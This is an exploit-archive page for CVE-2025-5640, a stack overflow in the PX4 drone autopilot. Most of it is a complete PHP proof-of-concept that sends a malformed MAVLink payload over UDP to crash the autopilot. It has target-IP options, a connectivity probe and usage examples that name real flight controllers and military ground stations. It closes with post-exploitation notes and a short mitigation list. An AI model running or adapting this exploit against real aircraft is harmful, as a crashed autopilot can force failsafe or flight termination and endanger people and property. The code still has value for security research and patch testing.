| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
| CVE-2025-5640 | 5 Jun 202506:48 | โ | circl | |
| PX4 Drone Autopilot 安全漏洞 | 5 Jun 202500:00 | โ | cnnvd | |
| CVE-2025-5640 | 5 Jun 202506:00 | โ | cve | |
| CVE-2025-5640 PX4-Autopilot TRAJECTORY_REPRESENTATION_WAYPOINTS Message mavlink_receiver.cpp stack-based overflow | 5 Jun 202506:00 | โ | cvelist | |
| PX4 Military UAV Autopilot 1.12.3 - Denial of Service (DoS) | 26 Jun 202500:00 | โ | exploitdb | |
| EUVD-2025-16967 | 3 Oct 202520:07 | โ | euvd | |
| Exploit for CVE-2025-5640 | 21 Jun 202511:52 | โ | githubexploit | |
| CVE-2025-5640 | 5 Jun 202506:15 | โ | nvd | |
| ๐ PX4 Military UAV Autopilot 1.12.3 Denial of Service | 26 Jun 202500:00 | โ | packetstorm | |
| ๐ Keras 2.15 Insecure Deserialization | 18 Dec 202500:00 | โ | packetstorm |
=============================================================================================================================================
| # Title : PX4 Military UAV Autopilot 1.12.3 Remote DoS Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://docs.px4.io/v1.12/ |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/202894/ & CVE-2025-5640
[+] Summary : This PoC targets a Stack-Based Buffer Overflow vulnerability in PX4 Military UAV Autopilot versions up to 1.12.3.
An attacker who can reach the autopilot's MAVLink port sends a malformed MAVLink message of type
TRAJECTORY_REPRESENTATION_WAYPOINTS to cause a complete failure (Denial of Service) of the UAV's autopilot.
The PoC sends the malformed MAVLink payload via UDP to the common control ports (14540–14550).
Received data that exceeds the expected size overwrites stack memory, causing the autopilot to malfunction
and the aircraft to enter Failsafe mode or lose connectivity entirely.
Because the message arrives over plain UDP, exposure depends on which hosts can reach that port; the mitigations the PoC itself prints are updating PX4 beyond 1.12.3, MAVLink message validation, message authentication and network segmentation for UAV communications.
[+] POC : php poc.php
<?php
/**
* Author: indoushka
* Description:
* Stack-based buffer overflow vulnerability in PX4 Military UAV Autopilot <=1.12.3
* triggered via malformed MAVLink TRAJECTORY_REPRESENTATION_WAYPOINTS message.
*/
class PX4UAVExploit {
private $targetIp;
private $targetPort;
private $timeout;
private $verbose;
// Malformed MAVLink hex payload
private $hexPayload = "fdef0000dcea6f4c01006de9d06a0548182a1fcc8b7cc542eb8945a54baa92ee908db9af0195bb5dce5f9ab613be912485d34e577c352c5cdc06592484be1aecd64a07127bda31fc8f41f300a9e4a0eab80d8835f106924f0b89ece3e256dda30e3001f07df4e1633e6f827b7812731dbc3daf1e81fc06cea4d9c8c1525fb955d3eddd7454b54bb740bcd87b00063bd9111d4fb4149658d4ccd92974c97c7158189a8d6";
/**
 * Record the target endpoint and runtime settings. Nothing is opened or sent here.
 *
 * @param string $ip      Target address (default: loopback).
 * @param int    $port    Target UDP port.
 * @param int    $timeout Socket timeout in seconds, applied later when sockets are created.
 * @param bool   $verbose Stored on the instance; no method in this class reads it.
 */
public function __construct($ip = "127.0.0.1", $port = 14540, $timeout = 5, $verbose = false) {
    // One destructuring assignment instead of four statements; the values are independent.
    [$this->targetIp, $this->targetPort, $this->timeout, $this->verbose] = [$ip, $port, $timeout, $verbose];
}
/**
 * Entry point: print the banner, then dispatch on the requested mode.
 *
 * "check" runs the connectivity probe and "dos" runs the payload sender. Any other
 * value is reported as an error and nothing is sent. An Exception raised by either
 * mode is caught here and printed rather than propagated.
 *
 * @param string $mode "check" or "dos" (default "dos").
 */
public function run($mode = "dos") {
    $this->showBanner();
    try {
        // Loose comparison on purpose: it matches what the original switch did.
        if ($mode == "check") {
            $this->checkConnection();
        } elseif ($mode == "dos") {
            $this->executeDos();
        } else {
            $this->error("Unknown mode: $mode");
            return;
        }
    } catch (Exception $failure) {
        $this->error("Execution failed: " . $failure->getMessage());
    }
}
/**
 * "check" mode: send one heartbeat datagram and wait for any UDP reply.
 *
 * The reply is never parsed. Any datagram of one or more bytes that arrives within the
 * timeout is reported as "responsive", so a PASSED result only shows that something
 * answered this socket, not that the peer is a PX4 instance or that it is vulnerable.
 * Returns nothing; every outcome is printed through the logging helpers.
 */
private function checkConnection() {
$this->info("Testing connection to PX4 autopilot...");
$this->info("Target: {$this->targetIp}:{$this->targetPort}");
// Create UDP socket (createUdpSocket() returns false when socket_create() fails)
$socket = $this->createUdpSocket();
if (!$socket) {
$this->error("Failed to create UDP socket");
return;
}
// Send heartbeat check: a single datagram built by createMavlinkHeartbeat()
$heartbeat = $this->createMavlinkHeartbeat();
$result = socket_sendto($socket, $heartbeat, strlen($heartbeat), 0, $this->targetIp, $this->targetPort);
if ($result === false) {
$this->error("Failed to send heartbeat");
} else {
$this->info("Heartbeat sent successfully");
// Wait for response: the receive timeout reuses the configured timeout in seconds
socket_set_option($socket, SOL_SOCKET, SO_RCVTIMEO, array('sec' => $this->timeout, 'usec' => 0));
$response = '';
$from = '';
$port = 0;
// Reads at most 1024 bytes; $from and $port are filled in by reference with the sender.
$bytes = socket_recvfrom($socket, $response, 1024, 0, $from, $port);
// A false return (timeout or error) also fails this test and lands in the warning branch.
if ($bytes > 0) {
$this->success("PX4 autopilot is responsive! Received $bytes bytes from $from:$port");
$this->info("Connection test PASSED");
} else {
$this->warning("No response received - PX4 may be offline or not listening");
}
}
socket_close($socket);
}
/**
 * "dos" mode: after a five-second countdown, send the stored payload to the target three times.
 *
 * Nothing is read back from the target. The closing "delivered" message therefore reports
 * only that the local send calls succeeded and says nothing about the receiver's state.
 * On the wire this is three identical UDP datagrams, about 100 ms apart, to one address
 * and port. That is the pattern a monitor on the MAVLink link would observe.
 * Returns nothing; every outcome is printed through the logging helpers.
 */
private function executeDos() {
$this->warning("๐จ LAUNCHING DENIAL OF SERVICE ATTACK ๐จ");
$this->info("Target: {$this->targetIp}:{$this->targetPort}");
$this->info("This will crash the PX4 autopilot if vulnerable");
// Countdown: five one-second sleeps before anything is sent
for ($i = 5; $i > 0; $i--) {
$this->info("Sending exploit in $i seconds... (Ctrl+C to abort)");
sleep(1);
}
$socket = $this->createUdpSocket();
if (!$socket) {
$this->error("Failed to create UDP socket for attack");
return;
}
// Convert hex payload to binary; hex2bin() returns false when the string cannot be decoded
$payload = hex2bin($this->hexPayload);
if (!$payload) {
$this->error("Failed to decode hex payload");
socket_close($socket);
return;
}
$this->info("Sending malformed MAVLink packet...");
// The same datagram is sent three times; only the local send result is counted
$packetsSent = 0;
for ($i = 0; $i < 3; $i++) {
$result = socket_sendto($socket, $payload, strlen($payload), 0, $this->targetIp, $this->targetPort);
if ($result === false) {
$this->error("Failed to send packet #" . ($i + 1));
} else {
$this->info("Packet #" . ($i + 1) . " sent successfully ($result bytes)");
$packetsSent++;
}
usleep(100000); // 100ms delay between packets
}
socket_close($socket);
// "Delivered" here means at least one socket_sendto() call did not return false.
if ($packetsSent > 0) {
$this->success("Exploit packets delivered successfully");
$this->warning("PX4 autopilot should crash if vulnerable to CVE-2025-5640");
$this->showPostExploitationInfo();
} else {
$this->error("No packets were sent successfully");
}
}
/**
 * Open an IPv4 UDP socket with SO_REUSEADDR set and a send timeout.
 *
 * The send timeout is the instance timeout in whole seconds. The results of the
 * socket_set_option() calls are not checked.
 *
 * @return resource|\Socket|false The socket, or false when socket_create() fails.
 */
private function createUdpSocket() {
    $handle = socket_create(AF_INET, SOCK_DGRAM, SOL_UDP);
    if ($handle !== false) {
        $sendTimeout = array('sec' => $this->timeout, 'usec' => 0);
        socket_set_option($handle, SOL_SOCKET, SO_REUSEADDR, 1);
        socket_set_option($handle, SOL_SOCKET, SO_SNDTIMEO, $sendTimeout);
    }
    // On failure $handle is still false, which is what callers test for.
    return $handle;
}
/**
 * Return the fixed probe frame used by "check" mode as a binary string.
 *
 * The bytes are a hard-coded literal which the author describes as a MAVLink heartbeat
 * (system ID 255, component ID 0). Nothing here validates the framing or the checksum.
 *
 * @return string The decoded bytes, or '' when hex2bin() fails. In that case the
 *                caller sends a zero-length datagram.
 */
private function createMavlinkHeartbeat() {
    $frame = hex2bin("fe09000000ff0000000000000000000000000203d403");
    if (!$frame) {
        return '';
    }
    return $frame;
}
/**
 * Print a fixed block of follow-up notes: status checks, impact, recovery and mitigations.
 *
 * The text is static. This method observes nothing about the target, and executeDos()
 * calls it whenever at least one local send succeeded. The mitigation list at the end
 * (update PX4, validate MAVLink messages, authenticate messages, segment the network)
 * is the defensive guidance carried by the sample itself.
 * NOTE(review): the icons and rule characters in the literal are mis-encoded in this
 * copy. They are left as found because doc-only edits must not alter runtime strings.
 */
private function showPostExploitationInfo() {
$this->info("
๐ POST-EXPLOITATION ACTIONS:
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
1. Monitor UAV Status:
โข Check if autopilot stopped responding
โข Verify telemetry data interruption
โข Observe flight controller behavior
2. Impact Assessment:
โข Autopilot crash = UAV may enter failsafe mode
โข Possible flight termination in worst case
โข Ground station connection loss
3. Recovery Actions:
โข Restart PX4 software
โข Reboot flight controller
โข Re-establish MAVLink connections
๐ก๏ธ MITIGATION RECOMMENDATIONS:
โข Update PX4 to version > 1.12.3
โข Implement MAVLink message validation
โข Use message authentication
โข Network segmentation for UAV communications
");
}
/**
 * Echo the static start-up banner (title, CVE id, affected version, impact, author).
 *
 * run() calls this before any mode is dispatched. It has no inputs and no side effects
 * other than writing to stdout.
 * NOTE(review): the frame characters are mis-encoded in this copy and are left as found.
 */
private function showBanner() {
echo "
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ PX4 UAV AUTOPILOT EXPLOIT โ
โ CVE-2025-5640 - Remote DoS Exploit โ
โ โ
โ Target: PX4 Military UAV Autopilot <= 1.12.3 โ
โ Vulnerability: Stack-based Buffer Overflow โ
โ Impact: Denial of Service (Autopilot Crash) โ
โ Author: indoushka โ
โ PHP Implementation โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ\n\n";
}
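/**
 * Print an informational line to stdout.
 *
 * @param string $message Text printed after the "[INFO]" tag, followed by a newline.
 */
private function info($message) {
    // Icon repaired: this copy showed its UTF-8 bytes decoded with a Thai single-byte charset.
    echo "ℹ️ [INFO] " . $message . "\n";
}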
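/**
 * Print a success line to stdout.
 *
 * @param string $message Text printed after the "[SUCCESS]" tag, followed by a newline.
 */
private function success($message) {
    // Prefix repaired: one byte of the mis-decoded icon had become a line break, which
    // split the literal in two. It is a single-line prefix again, like its siblings.
    echo "✅ [SUCCESS] " . $message . "\n";
}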
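/**
 * Print a warning line to stdout.
 *
 * @param string $message Text printed after the "[WARNING]" tag, followed by a newline.
 */
private function warning($message) {
    // Icon repaired: this copy showed its UTF-8 bytes decoded with a Thai single-byte charset.
    echo "⚠️ [WARNING] " . $message . "\n";
}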
/**
 * Print an error line to stdout. It does not throw or exit.
 *
 * @param string $message Text printed after the "[ERROR]" tag, followed by a newline.
 */
private function error($message) {
    // The leading glyph is mis-encoded in this copy and its original character cannot be
    // recovered from the visible bytes, so the literal is kept exactly as found.
    echo "โ [ERROR] ", $message, "\n";
}
}
/**
 * Echo the static usage text: options, examples, disclaimer and technical summary.
 *
 * The text documents the defaults as mode "dos", 127.0.0.1 and port 14540. A bare
 * invocation with no options therefore already sends the payload to a local listener.
 * The usage lines name the script px4_exploit.php, while the page header runs it as poc.php.
 * NOTE(review): the icons, bullets and rule characters are mis-encoded in this copy and
 * are left as found.
 */
function showHelp() {
echo "
๐ PX4 UAV Autopilot DoS Exploit (CVE-2025-5640)
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
๐ ๏ธ Usage:
php px4_exploit.php [OPTIONS]
๐ Options:
--ip Target IP address (default: 127.0.0.1)
--port Target UDP port (default: 14540)
--mode Operation mode: dos, check (default: dos)
--timeout Timeout in seconds (default: 5)
--help Show this help information
๐ฏ Examples:
# Check connection to PX4
php px4_exploit.php --mode check --ip 192.168.1.100 --port 14550
# Launch DoS attack
php px4_exploit.php --mode dos --ip 192.168.1.100 --port 14550
# Attack local SITL instance
php px4_exploit.php --mode dos
โ ๏ธ LEGAL DISCLAIMER:
This tool is for authorized security testing only.
Do not use against systems you don't own or have permission to test.
Military UAV systems are critical infrastructure.
Unauthorized access may violate national and international laws.
๐ง Technical Details:
โข Vulnerability: Buffer overflow in MAVLink message handling
โข Affected: PX4 Autopilot <= 1.12.3
โข Protocol: MAVLink over UDP
โข Port: Typically 14540-14550
โข Impact: Autopilot crash โ UAV failsafe/termination
๐ฏ Target Environments:
โข PX4 SITL (Software In The Loop)
โข Real PX4 flight controllers
โข Military UAV ground control stations
โข Drone testing laboratories
\n";
}
/**
 * Turn the raw CLI argument vector into an options array.
 *
 * Recognised flags are --ip, --port, --mode, --timeout (each consumes the next
 * argument as its value) and --help. A flag given as the last argument falls back
 * to its default. Unrecognised arguments are skipped without any message, and no
 * value is validated here: --port and --timeout simply go through intval().
 *
 * @param array $argv Argument vector; index 0 (the script name) is ignored.
 * @return array Keys 'ip', 'port', 'mode', 'timeout', 'help', in that order.
 */
function parseArguments($argv) {
    $options = [
        'ip' => '127.0.0.1',
        'port' => 14540,
        'mode' => 'dos',
        'timeout' => 5,
        'help' => false
    ];
    $total = count($argv);
    $cursor = 1;
    while ($cursor < $total) {
        $flag = $argv[$cursor];
        // Loose comparison and this branch order mirror the original switch.
        if ($flag == '--ip') {
            $cursor++;
            $options['ip'] = $argv[$cursor] ?? '127.0.0.1';
        } elseif ($flag == '--port') {
            $cursor++;
            $options['port'] = intval($argv[$cursor] ?? 14540);
        } elseif ($flag == '--mode') {
            $cursor++;
            $options['mode'] = $argv[$cursor] ?? 'dos';
        } elseif ($flag == '--timeout') {
            $cursor++;
            $options['timeout'] = intval($argv[$cursor] ?? 5);
        } elseif ($flag == '--help') {
            $options['help'] = true;
        }
        $cursor++;
    }
    return $options;
}
// Main execution: refuse non-CLI use, parse options, validate mode/IP/port, then run.
// Only this top-level code validates input; the class itself accepts whatever it is given.
if (php_sapi_name() !== 'cli') {
die("โ This script must be run from command line\n");
}
$options = parseArguments($argv);
// --help prints the usage text and exits before anything is validated or sent.
if ($options['help']) {
showHelp();
exit(0);
}
// Validate mode: only 'dos' and 'check' are accepted
if (!in_array($options['mode'], ['dos', 'check'])) {
echo "โ Invalid mode. Use 'dos' or 'check'\n";
showHelp();
exit(1);
}
// Validate IP address: must be an IP literal, so hostnames are rejected
if (!filter_var($options['ip'], FILTER_VALIDATE_IP)) {
echo "โ Invalid IP address: {$options['ip']}\n";
exit(1);
}
// Validate port: must be within 1-65535
if ($options['port'] < 1 || $options['port'] > 65535) {
echo "โ Invalid port number: {$options['port']}\n";
exit(1);
}
// NOTE(review): the timeout is not range-checked; the intval() result is passed on as is.
try {
// The fourth argument sets verbose to true, but no method in the class reads that flag.
$exploit = new PX4UAVExploit(
$options['ip'],
$options['port'],
$options['timeout'],
true
);
$exploit->run($options['mode']);
} catch (Exception $e) {
echo "โ Fatal error: " . $e->getMessage() . "\n";
exit(1);
}
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================